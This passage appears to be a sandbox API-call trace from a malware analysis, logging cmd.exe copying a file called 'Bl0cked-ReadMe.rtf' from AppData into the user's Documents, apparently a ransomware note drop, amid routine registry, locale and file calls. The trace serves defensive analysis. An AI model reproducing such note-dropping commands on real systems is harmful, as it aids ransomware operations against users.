RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf9f4 | out: phkResult=0x1cf9f4*=0x0) returned 0x2 [0131.850] VirtualQuery (in: lpAddress=0x1cfa2b, lpBuffer=0x1cf9c4, dwLength=0x1c | out: lpBuffer=0x1cf9c4*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.850] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf9c4, dwLength=0x1c | out: lpBuffer=0x1cf9c4*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.850] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf9c4, dwLength=0x1c | out: lpBuffer=0x1cf9c4*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.850] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf9c4, dwLength=0x1c | out: lpBuffer=0x1cf9c4*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.850] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf9c4, dwLength=0x1c | out: lpBuffer=0x1cf9c4*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.850] GetConsoleOutputCP () returned 0x1b5 [0131.850] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.850] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.850] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.850] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.850] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.850] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.850] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.851] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.851] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.851] GetEnvironmentStringsW () returned 0x350168* [0131.851] FreeEnvironmentStringsW (penv=0x350168) returned 1 [0131.851] GetEnvironmentStringsW () returned 0x350168* [0131.851] FreeEnvironmentStringsW (penv=0x350168) returned 1 [0131.851] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce964 | out: phkResult=0x1ce964*=0x40) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x90, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x1, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x1, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x0, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x40, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x40, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x40, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.851] RegCloseKey (hKey=0x40) returned 0x0 [0131.851] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce964 | out: phkResult=0x1ce964*=0x40) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x40, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x1, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x1, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x0, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x9, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x9, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x9, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.852] RegCloseKey (hKey=0x40) returned 0x0 [0131.852] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.852] srand (_Seed=0x5b886366) [0131.852] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0131.852] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0131.852] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.852] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3518c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.853] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.853] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.853] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.853] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.853] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.853] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.853] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.853] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.853] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.853] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.853] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.853] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.853] GetEnvironmentStringsW () returned 0x3522b8* [0131.853] FreeEnvironmentStringsW (penv=0x3522b8) returned 1 [0131.853] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.853] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.853] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.853] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.853] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.853] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.853] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.853] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.853] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.853] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.853] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf730 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.854] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf730, lpFilePart=0x1cf72c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf72c*="Desktop") returned 0x18 [0131.854] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.854] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf4ac | out: lpFindFileData=0x1cf4ac) returned 0x34fff8 [0131.854] FindClose (in: hFindFile=0x34fff8 | out: hFindFile=0x34fff8) returned 1 [0131.854] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf4ac | out: lpFindFileData=0x1cf4ac) returned 0x34fff8 [0131.854] FindClose (in: hFindFile=0x34fff8 | out: hFindFile=0x34fff8) returned 1 [0131.854] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf4ac | out: lpFindFileData=0x1cf4ac) returned 0x34fff8 [0131.854] FindClose (in: hFindFile=0x34fff8 | out: hFindFile=0x34fff8) returned 1 [0131.854] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.854] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.854] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.854] GetEnvironmentStringsW () returned 0x352ad8* [0131.855] FreeEnvironmentStringsW (penv=0x352ad8) returned 1 [0131.855] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.855] GetConsoleOutputCP () returned 0x1b5 [0131.855] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.855] GetUserDefaultLCID () returned 0x409 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf870, cchData=128 | out: lpLCData="0") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf870, cchData=128 | out: lpLCData="0") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf870, cchData=128 | out: lpLCData="1") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.856] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.857] GetConsoleTitleW (in: lpConsoleTitle=0x3408d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.858] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.858] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.858] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.858] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.859] _wcsicmp (_String1="type", _String2=")") returned 75 [0131.859] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0131.859] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0131.859] _wcsicmp (_String1="IF", _String2="type") returned -11 [0131.859] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0131.859] _wcsicmp (_String1="REM", _String2="type") returned -2 [0131.859] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0131.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.864] GetFileType (hFile=0x7) returned 0x2 [0131.864] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0131.864] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf768 | out: lpMode=0x1cf768) returned 1 [0131.864] _dup (_FileHandle=1) returned 3 [0131.864] _close (_FileHandle=1) returned 0 [0131.865] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0131.865] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf738, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0131.866] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0131.866] GetConsoleTitleW (in: lpConsoleTitle=0x1cf568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.944] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0131.944] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0131.944] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0131.944] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0131.945] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.945] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1cf0cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf0cc) returned 0x340e50 [0131.945] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0131.945] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0131.945] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0131.945] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cdfd8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0131.945] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0131.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.945] GetFileType (hFile=0x54) returned 0x1 [0131.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.946] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ce030 | out: lpFileSizeHigh=0x1ce030*=0x0) returned 0x1632 [0131.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.946] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.946] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.947] GetFileType (hFile=0x4c) returned 0x1 [0131.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.947] GetFileType (hFile=0x4c) returned 0x1 [0131.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.947] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.949] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.950] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle 